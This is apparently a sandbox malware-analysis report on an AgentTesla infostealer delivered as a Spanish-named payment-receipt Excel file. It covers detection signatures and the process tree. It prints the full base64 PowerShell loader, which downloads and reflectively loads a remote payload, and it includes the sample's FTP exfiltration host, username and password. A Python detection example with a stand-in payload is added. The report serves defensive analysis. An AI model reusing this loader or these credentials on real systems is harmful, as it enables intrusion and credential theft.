Windows
Analysis Report
Comprobante de pago.xlam.xlsx
Overview
General Information
Detection
AgentTesla
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3364, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
  - EQNEDT32.EXE (PID: 3580, cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    - wscript.exe (PID: 3736, cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs", MD5: 979D74799EA6C8B8167869A68DF5204A)
      - powershell.exe (PID: 3784, MD5: EB32C070E658937AA9FA9F3AE629B2B8, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro)
        - InstallUtil.exe (PID: 3976, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", MD5: AF862061889F5B9B956E9469DCDAE773)

The command line carries no script file: the whole loader is the base64 literal assigned to $elar, decoded with FromBase64String and run with Invoke-Expression (the "Base64 Encoded PowerShell Command" and "FromBase64String Cmdlet" Sigma hits). Decoding that literal yields a second PowerShell stage that fetches a text file from a filemail.com URL with System.Net.WebClient.DownloadData, carves the text between the markers <<BASE64_START>> and <<BASE64_END>>, reverses it character by character, base64-decodes the result, loads it with [System.Reflection.Assembly]::Load, and invokes the method VAI on the type dnlib.IO.Home with an argument list that includes a reversed URL string and the string 'InstallUtil'. That last argument is consistent with the InstallUtil.exe child that follows and with the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures above.
- cleanup
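The chain above (Equation Editor spawning a script host, then PowerShell handed a base64 literal that goes through FromBase64String and Invoke-Expression) is what the "Suspicious Microsoft Office Child Process", "WScript or CScript Dropper" and base64-PowerShell Sigma hits describe. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: it runs that detection logic over constructed process-creation events modelled on the process tree and decodes the inline base64 stage. PIDs and image paths follow the tree; the parent/child links, the .vbs file name `dropper.vbs`, the short stand-in payload and its URL `http://example.invalid/stage2.txt`, and the benign control process are assumptions.

```python
import base64
import binascii
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed stand-in for the loader stage the sample hides in base64 (the
# real blob is not reproduced here); it keeps the same shape: download, then
# Invoke-Expression on the fetched text.
STAGE1 = ("$u = 'http://example.invalid/stage2.txt';"
          "$w = New-Object System.Net.WebClient;"
          "$d = $w.DownloadData($u);"
          "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($d))")
STAGE1_B64 = base64.b64encode(STAGE1.encode("utf-8")).decode("ascii")
LOADER_CMDLINE = (
    f'"{PS}" $elar = \'{STAGE1_B64}\';'
    "$alteastro = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro"
)

# Constructed process-creation events. PIDs and image paths follow the
# report's process tree; parent links, the .vbs name and the benign control
# process at the end are assumptions.
EVENTS = [
    {"pid": 3364, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"pid": 3580, "ppid": 3364, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 3736, "ppid": 3580, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\dropper.vbs"'},
    {"pid": 3784, "ppid": 3736, "image": PS, "cmdline": LOADER_CMDLINE},
    {"pid": 3976, "ppid": 3784, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'},
    # benign control: an interactive PowerShell with a plain command line
    {"pid": 4100, "ppid": 1, "image": PS, "cmdline": f'"{PS}" Get-Process'},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from pid up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def office_child_chains(events):
    """Flag script hosts whose ancestry passes through an Office application
    or the Equation Editor (the 'Suspicious Microsoft Office Child Process'
    idea, applied over the whole ancestry rather than a single parent hop)."""
    hits = []
    for e in events:
        chain = ancestry(events, e["pid"])
        if chain[0] in SCRIPT_HOSTS and any(a in OFFICE_PARENTS for a in chain[1:]):
            hits.append((e["pid"], " <- ".join(chain)))
    return hits


B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{40,}={0,2})'")
URL = re.compile(r"https?://[^\s'\"]+")


def decode_inline_base64(cmdline):
    """Decode a quoted base64 literal on a PowerShell command line and report
    what the decoded stage does. Returns None when no such literal is present
    or it does not decode."""
    m = B64_LITERAL.search(cmdline)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", errors="replace")
    except binascii.Error:
        return None
    return {
        "decoded": decoded,
        "urls": URL.findall(decoded),
        "iex": "Invoke-Expression" in decoded or "Invoke-Expression" in cmdline,
        "download": bool(re.search(r"Download(Data|String|File)", decoded)),
    }


def triage(events):
    """Combine both checks into one findings record per event set."""
    findings = {"chains": office_child_chains(events), "powershell": {}}
    for e in events:
        if basename(e["image"]) == "powershell.exe":
            findings["powershell"][e["pid"]] = decode_inline_base64(e["cmdline"])
    return findings


if __name__ == "__main__":
    result = triage(EVENTS)
    for pid, chain in result["chains"]:
        print(f"office -> script host chain, pid {pid}: {chain}")
    for pid, info in result["powershell"].items():
        if info:
            print(f"pid {pid}: iex={info['iex']} download={info['download']} urls={info['urls']}")
```

Two points worth noting about the design: the chain check walks the full ancestry rather than one parent hop, because EQNEDT32.EXE, not EXCEL.EXE, is the direct parent of the script host here; and the base64 check decodes only quoted literals of 40 or more base64 characters, so an ordinary `Get-Process` invocation is left alone while the loader's `$elar` literal is decoded and its URL and `DownloadData` call surfaced.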
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |

Extracted malware configuration (exfiltration over FTP; the credentials below are the ones embedded in the sample):

```json
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "biggiemma@horeca-bucuresti.ro", "Password": "e)rWKbKP8~mO"}
```
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |

(6 matches in total; the first 5 are shown.)

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
 | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | |
 | MALWARE_Win_AgentTeslaV2 | AgentTesla Type 2 Keylogger payload | ditekSHen | |
 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

(9 matches in total; the first 5 are shown.)
Exploits
Source | Author |
---|---|
(not extracted) | Joe Security |
(not extracted) | Joe Security |

System Summary
Source | Author |
---|---|
(not extracted) | Florian Roth (Nextron Systems) |